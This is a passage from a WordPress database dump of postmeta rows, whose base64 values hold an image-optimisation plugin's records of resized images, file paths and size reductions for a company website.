saWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjM4OTUsInRpbWUiOjE0ODM1ODA4MDgsImlkIjo4NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0NzQsInRpbWUiOjE0ODM1ODA4MTEsImlkIjo4NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MzIsInRpbWUiOjE0ODM1ODA4MTQsImlkIjo4NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NjksInRpbWUiOjE0ODM1ODA4MTgsImlkIjo4NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5MTIsInRpbWUiOjE0ODM1ODA4MjEsImlkIjo4NDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQzMCwidGltZSI6MTQ4MzU4MDgyNSwiaWQiOjg0NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDA4LCJ0aW1lIjoxNDgzNTgwODI4LCJpZCI6ODQ1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo0NTksInRpbWUiOjE0ODM1ODA4MzIsImlkIjo4NDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjQ0NiwidGltZSI6MTQ4MzU4MDgzNSwiaWQiOjg0NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NDc4LCJ0aW1lIjoxNDgzNTgwODM5LCJpZCI6ODQ1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29936, 841, 'wpfc_optimisation_reduction', '1621518'); 
INSERT INTO `wp_postmeta` VALUES (29937, 841, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LmpwZyIsIndpZHRoIjoyMzM2LCJoZWlnaHQiOjMzMjMsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9IZWxveHkuanBnIiwicmVkdWN0aW9uIjoxNjIxMzgyLCJ0aW1lIjoxNDgzNTgwODUwLCJpZCI6Ijg0MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSGVsb3h5LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwODUyLCJpZCI6ODQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hlbG94eS01NjJ4ODAwLmpwZyIsIndpZHRoIjo1NjIsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hlbG94eS01NjJ4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hlbG94eS01NjJ4ODAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MDg1NSwiaWQiOjg0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IZWxveHktNzY4eDEwOTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0IjoxMDkyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hlbG94eS03Njh4MTA5Mi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9IZWxveHktNzY4eDEwOTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwODU4LCJpZCI6ODQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hlbG94eS0xMTI1eDE2MDAuanBnIiwid2lkdGgiOjExMjUsImhlaWdodCI6MTYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IZWxveHktMTEyNXgxNjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hlbG94eS0xMTI1eDE2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwODYyLCJpZCI6ODQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hlbG94eS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hlbG94eS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hlbG94eS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MDg2NCwiaWQiOjg0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IZWxveHktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9IZWxveHktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9IZWxveHktMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODA4NjcsImlkIjo4NDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSGVsb3h5LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwODY5LCJpZCI6ODQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hlbG94eS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hlbG94eS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hlbG94eS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MDg3MiwiaWQiOjg0MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hlbG94eS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hlbG94eS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hlbG94eS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTI0LCJ0aW1lIjoxNDgzNTgwODc0LCJpZCI6ODQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSGVsb3h5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwODc3LCJpZCI6ODQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSGVsb3h5LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwODc5LCJpZCI6ODQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSGVsb3h5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwODgyLCJpZCI6ODQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSGVsb3h5LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSGVsb3h5LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwODg0LCJpZCI6ODQxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29938, 840, 'wpfc_optimisation_reduction', '14140'); 
INSERT INTO `wp_postmeta` VALUES (29939, 840, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLmpwZyIsIndpZHRoIjo0OTI4LCJoZWlnaHQiOjMyNjQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODA4ODksImlkIjoiODQwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjcyMiwidGltZSI6MTQ4MzU4MDg5MiwiaWQiOjg0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotODAweDUzMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotODAweDUzMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotODAweDUzMC5qcGciLCJyZWR1Y3Rpb24iOjE0MzAsInRpbWUiOjE0ODM1ODA4OTcsImlkIjo4NDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTc2OHg1MDkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTc2OHg1MDkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJUkVaLTc2OHg1MDkuanBnIiwicmVkdWN0aW9uIjoxMzQwLCJ0aW1lIjoxNDgzNTgwOTAxLCJpZCI6